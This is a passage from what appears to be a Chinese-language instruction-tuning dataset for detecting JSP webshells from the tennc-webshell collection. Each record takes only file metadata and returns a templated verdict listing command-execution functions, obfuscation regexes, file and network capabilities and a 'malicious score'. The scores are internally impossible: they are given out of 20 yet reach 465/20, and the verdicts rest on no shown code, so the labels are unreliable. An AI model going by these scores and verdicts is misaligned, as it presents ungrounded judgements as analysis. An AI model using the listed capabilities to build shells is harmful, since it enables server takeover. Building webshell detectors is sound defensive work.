Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/edit_ot.jsp", "malicious_score": 23, "md5_hash": "794e656491eddf9694975adcd2915ec0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"t00ls1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"135686 bytes\", \"行数\": 3294}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/t00ls1.jsp", "malicious_score": 462, "md5_hash": "c3cca1260f2667e66f83733cab9098ff"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spyjsp2010.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120715 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/spyjsp2010.jsp", "malicious_score": 465, "md5_hash": "655722eaa6c646437c8ae93daac46ae0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"config.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"144057 bytes\", \"行数\": 4237}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/config.jsp", "malicious_score": 462, "md5_hash": "d44df8b1543b837e57cc8f25a0a68d92"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"520.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57726 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/520.jsp", "malicious_score": 175, "md5_hash": "b0c4ae0670e06c3be27f4d7b8e4301ba"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xm.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"170 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/xm.jsp", "malicious_score": 9, "md5_hash": "ea5612492780a26b8aa7e5cedd9b8f4e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"0000.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120779 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/0000.jsp", "malicious_score": 465, "md5_hash": "2eeb8bf151221373ee3fd89d58ed4d38"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"807.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86574 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/807.jsp", "malicious_score": 316, "md5_hash": "ae76c77fb7a234380cd0ebb6fe1bcddf"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JFolder.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31057 bytes\", \"行数\": 1022}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JFolder.jsp", "malicious_score": 37, "md5_hash": "6bd8edbd1a1c262000d0958a3794fdb6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"one8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"170 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/one8.jsp", "malicious_score": 9, "md5_hash": "ea5612492780a26b8aa7e5cedd9b8f4e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pyth.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/pyth.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c5.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120311 bytes\", \"行数\": 3307}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/c5.jsp", "malicious_score": 465, "md5_hash": "8b457934da3821ba58b06a113e0d53d9"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57586 bytes\", \"行数\": 1813}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/2.jsp", "malicious_score": 175, "md5_hash": "24be582661569f91cc676f85ead061fe"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hideShell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"14560 bytes\", \"行数\": 393}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/hideShell.jsp", "malicious_score": 13, "md5_hash": "8547ef91e4dadea961a059418b1ad483"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"web.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"641 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 包含网络功能: HttpURLConnection 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/web.jsp", "malicious_score": 10, "md5_hash": "4bc11e28f5dccd0c45a37f2b541b2e98"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"dm.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86563 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/dm.jsp", "malicious_score": 316, "md5_hash": "c8daa6f278a2fdc32ecbaf4e1cd3abde"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspWebshell 1.2.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"26075 bytes\", \"行数\": 788}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 86/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JspWebshell 1.2.jsp", "malicious_score": 86, "md5_hash": "3ad8871c7e0af131bfb6d354bf229a82"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"x7.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86602 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/x7.jsp", "malicious_score": 316, "md5_hash": "7965e3d55cc0899e2586721eb85bd699"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"maint.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/maint.jsp", "malicious_score": 23, "md5_hash": "d56cb35721297e2df87ff4b6b1844a94"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"indexop.jsp.上传.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6220 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/indexop.jsp.上传.jsp", "malicious_score": 23, "md5_hash": "f4a235810e7a272633dbd7d11b94cf91"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"IXRbE02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"181 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/IXRbE02.jsp", "malicious_score": 9, "md5_hash": "e26e7e0ebc6e7662e1123452a939e2cd"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"job.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57726 bytes\", \"行数\": 1811}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/job.jsp", "malicious_score": 175, "md5_hash": "d6a0655273ed5bf26242ea4c8afcd02a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nogfw.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85010 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/nogfw.jsp", "malicious_score": 324, "md5_hash": "344f9073576a066142b2023629539ebd"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"test.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"451 bytes\", \"行数\": 3}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/test.jsp", "malicious_score": 9, "md5_hash": "c431584aa1104b674b57e38086e7f97a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ma3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84411 bytes\", \"行数\": 2317}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ma3.jsp", "malicious_score": 315, "md5_hash": "7d149e78f2ab9e419dd34a135c920432"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"system1.jsp.上传.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2106 bytes\", \"行数\": 68}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/system1.jsp.上传.jsp", "malicious_score": 12, "md5_hash": "ec4412371e861deb91ad15de2ac85298"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ver007.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"170 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ver007.jsp", "malicious_score": 9, "md5_hash": "ea5612492780a26b8aa7e5cedd9b8f4e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"73483 bytes\", \"行数\": 1934}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 184/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/shell.jsp", "malicious_score": 184, "md5_hash": "a7e25b8ac605753ed0c438db93f6c498"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cofigrue.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86511 bytes\", \"行数\": 2406}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/cofigrue.jsp", "malicious_score": 316, "md5_hash": "349ec229e3f8eda0f9eb918c74a8bf4c"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jfolder01.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30189 bytes\", \"行数\": 995}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jfolder01.jsp", "malicious_score": 37, "md5_hash": "08f3b1efbec31fcc861efac30aaafaff"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"2022-09-03-01.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"537 bytes\", \"行数\": 17}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/2022-09-03-01.jsp", "malicious_score": 12, "md5_hash": "7378901a199b8dbc80b766b7235365a7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"403.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"120782 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/403.jsp", "malicious_score": 465, "md5_hash": "059058a27a7b0059e2c2f007ad4675ef"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"icesword.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"57349 bytes\", \"行数\": 1808}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 发现混淆技术: ord\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 175/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/icesword.jsp", "malicious_score": 175, "md5_hash": "512ab4d65740926fc415d30d9e570b81"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"data02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30066 bytes\", \"行数\": 993}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/data02.jsp", "malicious_score": 37, "md5_hash": "facf92e0f359924e5ffa047cec2aa4f3"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"xx.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"700 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/xx.jsp", "malicious_score": 9, "md5_hash": "d0e05f9c9b8e0b3fa11f57d9ab800380"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"guige02.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2054 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/guige02.jsp", "malicious_score": 12, "md5_hash": "099e1d8f7d33aae8c193389d7f47a6a2"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mmym520.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84546 bytes\", \"行数\": 2323}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/mmym520.jsp", "malicious_score": 315, "md5_hash": "ba8d41d2c27d39acb207eb42b6f3655f"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ver008.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/ver008.jsp", "malicious_score": 23, "md5_hash": "a26d41e0b1b077af266633f53d550cbe"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"30188 bytes\", \"行数\": 994}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/jsp.jsp", "malicious_score": 37, "md5_hash": "64d27ec7891bedcc8990d143954af03d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mg.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6217 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/mg.jsp", "malicious_score": 23, "md5_hash": "794e656491eddf9694975adcd2915ec0"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"style.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"84734 bytes\", \"行数\": 2338}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/style.jsp", "malicious_score": 324, "md5_hash": "b9744f6876919c46a29ea05b1d95b1c3"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"85024 bytes\", \"行数\": 2344}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/JspSpy1.jsp", "malicious_score": 324, "md5_hash": "d71716df5042880ef84427acee8b121e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"silic webshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/silic webshell.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"info.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6221 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/jsp/info.jsp", "malicious_score": 23, "md5_hash": "dffb5e18586f9a05e4e212babbe526b7"}} {"instruction": 